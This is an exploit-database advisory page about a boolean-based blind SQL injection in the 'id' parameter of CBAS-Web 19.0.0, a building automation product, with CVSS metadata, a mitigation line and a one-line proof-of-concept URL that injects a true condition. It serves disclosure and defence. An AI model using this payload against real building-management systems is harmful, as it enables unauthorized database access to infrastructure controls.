header-logo
Suggest Exploit
vendor:
CBAS-Web
by:
LiquidWorm
7.5
CVSS
HIGH
Boolean-based Blind SQL Injection
CWE
Product Name: CBAS-Web
Affected Version From: 19.0.0
Affected Version To: 19.0.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2019

CBAS-Web 19.0.0 – ‘id’ Boolean-based Blind SQL Injection

The CBAS-Web application version 19.0.0 is vulnerable to a boolean-based blind SQL injection vulnerability in the 'id' parameter. An attacker can exploit this vulnerability to manipulate the SQL query and extract sensitive information from the database.

Mitigation:

Upgrade to a patched version of the CBAS-Web application.
Source

Exploit-DB raw data:

# Exploit Title: CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : N/A
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system

# Computrols CBAS-Web Authenticated Boolean-based Blind SQL Injection
# PoC (id param):

http://192.168.1.250/cbas/index.php?m=servers&a=start_pulling&id=1 AND 2510=2510

Navigation

Suggest Exploit

Services By CQR